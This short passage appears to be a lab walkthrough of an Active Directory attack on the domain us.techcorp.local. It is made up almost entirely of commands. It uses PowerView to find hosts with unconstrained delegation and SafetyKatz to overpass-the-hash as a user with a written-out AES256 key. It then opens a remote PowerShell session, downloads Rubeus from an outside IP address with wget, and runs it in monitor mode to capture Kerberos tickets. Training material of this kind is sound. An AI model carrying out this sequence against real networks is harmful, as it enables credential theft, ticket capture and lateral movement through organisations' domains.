Let’s load PowerView

. .\\PowerView.ps1

Now let’s check computers with unconstrained delegation setup

Get-DomainComputer -Unconstrained | select samaccountname

Notice we have US-WEB$ Server

Now let’s OverPass-The-Hash as webmaster user

.\\SafetyKatz.exe "sekurlsa::pth /user:webmaster /domain:us.techcorp.local /aes256:2a653f166761226eb2e939218f5a34d3d2af005a91f160540da6e4a5e29de8a0 /ptt"

on the new CMD let’s Open PowerShell and PS Remote to us-web Server

Enter-PSSession -ComputerName us-web

now let’s transfer Rubeus to the us-web Server

wget -Uri <http://192.168.100.36/Rubeus.exe> -OutFile Rubeus.exe

Now let’s open Rubeus in monitor mode

.\\Rubeus.exe monitor /interval:5 /nowrap